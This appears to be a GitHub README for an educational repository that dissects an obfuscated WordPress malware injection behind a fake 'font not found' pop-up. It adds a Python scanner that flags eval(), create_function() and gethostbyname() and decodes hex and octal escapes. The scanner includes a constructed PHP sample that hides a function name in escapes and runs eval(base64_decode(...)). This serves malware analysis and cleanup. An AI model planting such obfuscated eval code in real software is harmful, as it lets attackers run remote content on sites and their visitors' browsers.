magnocarvalho / wordpress-malware-educational


WordPress Malware (Educational)

My friend who runs a WordPress site received some feedback about an unusual pop-up that would appear on his site saying "The HoeflerText font wasn't found".

After investigating the source files I noticed some non-WordPress files and, additionally, one line of code (that looks malicious) in lots and lots of the .php files there.

Now, this malware is not new and has been around for some years. However, I've uploaded this for the following reasons:

  1. For educational purposes
  2. Teach you how to decode obfuscated code and what to look out for. You will learn how the person who wrote this used a range of substitution and transposition techniques, including octal and hex escape values, to obfuscate their code so as to avoid detection by major search engines
  3. How the eval() and create_function() functions are abused in this attack. Note: create_function() has been deprecated since PHP 7.2.0 and was removed in PHP 8.0. eval() is very dangerous and its use is discouraged. Even a seemingly harmless function like gethostbyname() is used to the attacker's advantage
  4. For developers who might want to use this one line of code as the search pattern for a find-and-replace across their WordPress codebase, to strip it out of every infected .php file

For those wanting to run this script to learn how it works, I recommend running it in a sandbox environment (an isolated VM with no access to production data), since the code fetches and executes content from a remote server.
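The reasons above (decoding octal/hex escapes, spotting eval()/create_function()/gethostbyname(), and finding the injected line across a codebase) are the day-one triage job. The following is an added example, not code from this repository: a small Python scanner that walks a WordPress tree, reports lines that call one of those functions or are built from hex/octal escapes, and decodes the escapes so the hidden string can be read. The PHP sample embedded in it is constructed for the demo; it is not the real injected line, and the threshold of 8 escapes per line is an assumed tuning value.

```python
"""Triage helper for the obfuscation techniques described above.

Added example (not from the repository): scans PHP source for the indicators
the README names (eval(), create_function(), gethostbyname(), and strings
built from \\xHH / \\OOO escapes) and decodes those escapes. The sample PHP
below is constructed for the demo; it is not the real injected line.
"""
import re
from pathlib import Path

# Functions the README singles out as abused by this malware.
SUSPICIOUS_CALLS = ("eval", "create_function", "gethostbyname")
CALL_RE = re.compile(r"\b(" + "|".join(SUSPICIOUS_CALLS) + r")\s*\(")
# Hex and octal escapes as PHP accepts them inside "..." strings.
OBF_ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")
# The same plus the common single-character escapes, for full decoding.
ANY_ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\([nrt\\$"])')
SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "\\": "\\", "$": "$", '"': '"'}
DQ_STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Assumed tuning value: lines with this many hex/octal escapes are reported
# even when no suspicious call appears on the same line.
ESCAPE_THRESHOLD = 8


def decode_php_escapes(s: str) -> str:
    """Resolve escapes the way PHP does for a double-quoted string literal."""
    def sub(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:
            return chr(int(m.group(2), 8) & 0xFF)  # PHP wraps octal values above \377
        return SIMPLE[m.group(3)]
    return ANY_ESCAPE_RE.sub(sub, s)


def decoded_strings(line: str) -> list:
    """Decoded form of every double-quoted literal on the line that uses hex/octal escapes."""
    return [decode_php_escapes(m.group(1)) for m in DQ_STRING_RE.finditer(line)
            if OBF_ESCAPE_RE.search(m.group(1))]


def scan_text(text: str) -> list:
    """One finding per suspicious line: line number, calls seen, escape count, decoded strings."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        calls = CALL_RE.findall(line)
        escapes = len(OBF_ESCAPE_RE.findall(line))
        if calls or escapes >= ESCAPE_THRESHOLD:
            findings.append({"line": lineno, "calls": calls, "escapes": escapes,
                             "decoded": decoded_strings(line)})
    return findings


def scan_tree(root: str) -> dict:
    """Scan every .php file under root; map path -> findings for files that have any."""
    results = {}
    for path in Path(root).rglob("*.php"):
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = scan_text(text)
        if hits:
            results[str(path)] = hits
    return results


# Constructed sample for the demo (not the real injected line from the repo).
SAMPLE_PHP = r'''<?php
$f = "\x67\x65\x74\x68\x6f\x73\x74\x62\x79\x6e\x61\x6d\x65";
$h = $f("\145\170\141\155\160\154\145\056\143\157\155");
eval(base64_decode($h));
echo "hello world";
'''

if __name__ == "__main__":
    # Run against the embedded sample; point scan_tree() at a wp-content/ copy for real use.
    for hit in scan_text(SAMPLE_PHP):
        print(f"line {hit['line']}: calls={hit['calls']} escapes={hit['escapes']} "
              f"decoded={hit['decoded']}")
```

Decoding the escapes is what turns `"\x67\x65..."` back into a readable function name, which is the same substitution the repository's annotated files walk you through by hand. Once you have the exact injected line from a real infection, the reported line numbers give you the list of files to clean.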

How to read

Start from 1-malware.php and work your way progressively through each file.

I've annotated my comments after a statement rather than before it. For example,

<?php
echo 'hello world';
// my annotation is after the echo statement above

So you'll analyse the code first and see my comments afterwards, which hopefully flows nicely.

What does this malware do?

It downloads content from a remote server (the attacker's) and injects it into your HTML markup just before the closing </body> or </html> tag, which is how the fake font pop-up described above reached visitors.

I run a WordPress site, should I be worried?

The simple answer is yes. Major search engines flag websites they believe have been compromised, so your website's listing on them will suffer; and because the injected content runs in your visitors' browsers, they are exposed to whatever the attacker chooses to serve. The link below is Google's approach to making the web safer. https://www.google.com/transparencyreport/safebrowsing/
